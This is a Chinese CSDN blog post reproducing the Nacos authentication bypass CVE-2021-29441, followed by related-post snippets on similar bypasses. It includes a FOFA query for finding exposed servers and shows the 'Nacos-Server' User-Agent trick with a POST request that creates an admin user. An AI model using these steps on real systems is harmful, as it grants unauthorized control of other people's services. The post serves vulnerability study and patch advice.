Nacos 身份验证绕过漏洞（CVE-2021-29441）

bmaoHk

已于 2024-10-05 00:33:11 修改

阅读量393

点赞数 8

分类专栏：渗透测试文章标签： web安全网络安全安全系统安全

于 2024-10-05 00:06:36 首次发布

本文链接：https://blog.csdn.net/bmaoHk/article/details/142708441

版权

渗透测试专栏收录该内容

3 篇文章 0 订阅

订阅专栏

一、描述

nacos是阿里巴巴的一个开源项目，旨在帮助构建云原生应用程序和微服务平台，在早期低版本的Nacos中，当配置文件使用身份验证（Dnacos.core.auth.enabled=true）时候，会判断请求ua是否为"Nacos-Server"，如果是的话则不进行任何认证

二、资产测绘

fofa:title=“nacos”
在这里插入图片描述

三、影响版本

Nacos <= 2.0.0-ALPHA.1

四、漏洞复现

1、访问/nacos/v1/auth/users?pageNo=1&pageSize=9验证漏洞是否存在
1、将UA改为：Nacos-Server
2、POST方法提交
3、POST /nacos/v1/auth/users?username=test&password=test HTTP/1.1

1、访问/nacos/v1/auth/users?pageNo=1&pageSize=9验证漏洞是否存在
在这里插入图片描述

在这里插入图片描述
2、创建用户

使用账号登录系统

五、修复建议

升级到最新版nacos

正在学习网络安全的小伙伴，有需要安全资料或者CISP资料的可以关注安全技术达人公众号，后期回不断分享安全知识，回复“学习资料”可领取网络安全书籍。

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

bmaoHk

关注关注

8
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

[ vulhub漏洞复现篇 ] 阿里巴巴Nacos身份验证绕过(nacos未授权)(CVE-2021-29441)

qq_51577576的博客

11-27

1456

[ vulhub漏洞复现篇 ] 阿里巴巴Nacos身份验证绕过(nacos未授权)(CVE-2021-29441) 该漏洞发生在nacos在进行认证授权操作时，会判断请求的user-agent是否为”Nacos-Server”，如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单，并且将协商好的user-agent设置为Nacos-Server，直接硬编码在了代码里，导致了漏洞的出现。并且利用这个未授权漏洞，攻击者可以获取到用户名密码等敏感信息。

Nacos 身份认证绕过漏洞(QVD-2023-6271)

feelxing的专栏

03-31

5738

Nacos 身份认证绕过漏洞(QVD-2023-6271)，nacos版本从1.4.1升级到2.2.1最新版本

参与评论您还未登录，请先登录后发表或查看评论

【Nacos未授权访问漏洞（CVE-2021-29441）复现】

一纸荒芜的博客

10-26

2994

Nacos未授权访问漏洞复现

Nacos身份认证绕过漏洞（QVD-2023-6271）

最新发布

bmaoHk的博客

10-04

437

nacos是阿里巴巴的一个开源项目，旨在帮助构建云原生应用程序和微服务平台，nacos在默认情况下未对token.secret.key进行修改，导致攻击者可以绕过密钥认证进入后台。也就是nacos的密钥是有默认值的，其鉴权是JWT,我们知道密钥即可伪造一个恶意的JWT令牌来攻击对于jwt加密其实就是用了base64 密钥是写死在源码里面的所以直接可以用jwt伪造攻击对应就是数据包的accesstoken。正在学习网络安全的小伙伴，有需要安全资料或者CISP资料的可以关注。”可领取网络安全书籍。

【备忘录】修复docker环境下的nacos安全漏洞：身份认证绕过漏洞

Xcong_Zhu的博客

10-23

2484

在nacos2.2.0.1和1.4.5版本之前的版本中，可能是为了便于开发环境使用，默认开启了一个自带的token默认值，导致上述报告中，可以利用默认的访问秘钥跳过认证，直接登陆。1、检查application.properties文件中token.secret.key属性，若为默认值，可参考：https://nacos.io/zh-cn/docs/v2/guide/user/auth.html进行更改。之后讲登录返回包修改为正确登录信息。点击发送发现正确登录返回信息。同时选中base64加密。

NACOS身份认证绕过漏洞

内心不种满鲜花就会长满杂草

02-24

1万+

目录漏洞描述影响版本 docker-compose文件一键搭建漏洞环境漏洞复现修复建议漏洞挖掘自动化探测脚本POC nacos：Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。漏洞描述 2020年12月29日，Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞。通过该漏洞,攻击者可.

Nacos 认证绕过漏洞（CVE-2021-29441）

gaomei2009的专栏

06-20

674

Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时，会判断请求的user-agent是否为”Nacos-Server”，如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。

Nacos认证绕过漏洞（CVE-2021-29441）

tpaer的博客

12-16

2060

复现Nacos认证绕过漏洞，导致未授权的任意访问。

CVE-2022-22978 Spring-security 认证绕过漏洞分析和漏洞挖掘思考

Q54665642ljf的博客

09-08

6479

在此之前，已经对CVE-2022-32532 Apache Shiro RegExPatternMatcher 认证绕过漏洞进行了分析，它和CVE-2022-22978漏洞产生原理上，本质是一样的。在分析这两个漏洞后，结合今年kcon议题《自动化API漏洞Fuzz实战》，产生了对漏洞挖掘关注点的一些思考。

NACOS身份认证绕过漏洞批量检测poc.7z

02-24

NACOS身份认证绕过漏洞批量检测poc.7z

Spring Security身份认证绕过漏洞风险通告

Trouvailless的博客

05-25

3913

近日，奇安信CERT监测到Spring Security 身份认证绕过漏洞 (CVE-2022-22978) 细节及PoC公开。当Spring Security中使用RegexRequestMatcher进行权限配置，且规则中使用带点号的正则表达式时，未经授权的远程攻击者可通过构造恶意数据包绕过身份认证，导致配置的权限验证失效。目前，奇安信CERT已复现此漏洞，同时鉴于已有细节及PoC公开，建议客户尽快做好自查，及时更新至最新版本。漏洞名称 Spring Security.

CVE-2024-22257: Spring Security AuthenticatedVoter 权限绕过漏洞及其在nacos中的修复

资源摘要信息:"Spring Security AuthenticatedVoter 权限绕过漏洞（CVE-2024-22257）影响了使用Spring Security框架的nacos版本。该漏洞存在于AuthenticatedVoter组件中，这是一个用于控制用户权限访问的投票机制。...

【认证绕过】NACOS身份认证绕过漏洞分析

m0_61572518的博客

04-12

6774

工作中遇到一个nacos服务认证绕过的问题，在此总结一下漏洞原因。

Nacos 存在认证绕过漏洞（CVE-2021-29441）

北方的孤夜

06-04

1983

Nacos 存在认证绕过漏洞（CVE-2021-29441）

nacos未授权-CVE-2021-29441复现

crowsec

07-21

7914

（附nuclei yaml文件）Nacos 身份认证绕过漏洞(CVE-2021-43116)漏洞复现

nglj9527的博客

05-20

1224

Nасоѕ是一个专为动态服务发现和配置以及服务管理而设计的平台。在 Nасоѕ 1.4.1 之前的版本中，当配置为使用身份验证（-Dnасоѕ.соrе.аuth.еnаblеd=truе）时，Nасоѕ 使用 AuthFilｔеr ѕеrvｌеt 过滤器强制执行身份验证。该过滤器有一个后门，使 Nасоѕ 服务器能够绕过该过滤器，从而跳过身份验证检查。此机制依赖于用户代理 HTTP 标头，因此很容易被欺骗。此漏洞可能允许任何用户在 Nасоѕ 服务器上执行任何管理任务。。

Nacos身份绕过漏洞（QVD-2023-6271）复现学习

dzqxwzoe的博客

03-01

1040

本文仅做复现，不做分析！其实就是默认keyshiro550exchange的jwt伪造等，都是类似的问题。Nacos是一个易于使用的平台，专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。目前Nacos身份认证绕过漏洞()，开源服务管理平台Nacos在默认配置下未对进行修改，导致远程攻击者可以绕过密钥认证进入后台，造成系统受控等后果。基本上都受到了影响，最新的版本已修复漏洞。